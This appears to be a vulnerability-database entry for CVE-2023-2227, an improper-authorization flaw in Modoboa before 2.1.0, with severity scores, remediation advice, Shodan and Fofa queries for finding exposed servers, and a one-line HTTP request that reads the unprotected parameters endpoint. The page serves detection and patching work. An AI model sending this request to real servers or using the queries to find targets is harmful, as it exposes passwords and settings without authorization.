🔙 목록으로 돌아가기

CVE-2023-2227: Modoboa < 2.1.0 - Improper Authorization

TitleModoboa < 2.1.0 - Improper Authorization
Authorritikchaddha,princechaddha
SeverityCritical
ImpactUnauthenticated attackers can access sensitive configuration parameters including default passwords and authentication settings through the API endpoint, potentially compromising the entire email management system.
RemediationUpdate Modoboa to version 2.1.0 or later that implements proper authorization checks for the parameters API endpoint.
CVSS Score9.1
EPSS Score0.90923
CVE IDCVE-2023-2227
CWE IDCWE-285
Shodan Queryhttp.favicon.hash:1949005079http.html:"modoboa"
Fofa Querybody="Modoboa"body="modoboa"icon_hash=1949005079
Tags cve cve2023 modoboa exposure disclosure vuln

🔍 Vulnerability Description

Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.

🌐 HTTP Request

GET /api/v2/parameters/core/ HTTP/1.1
Host: www.victim.com
User-Agent: 7h3h4ckv157
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-2227.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-2227.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A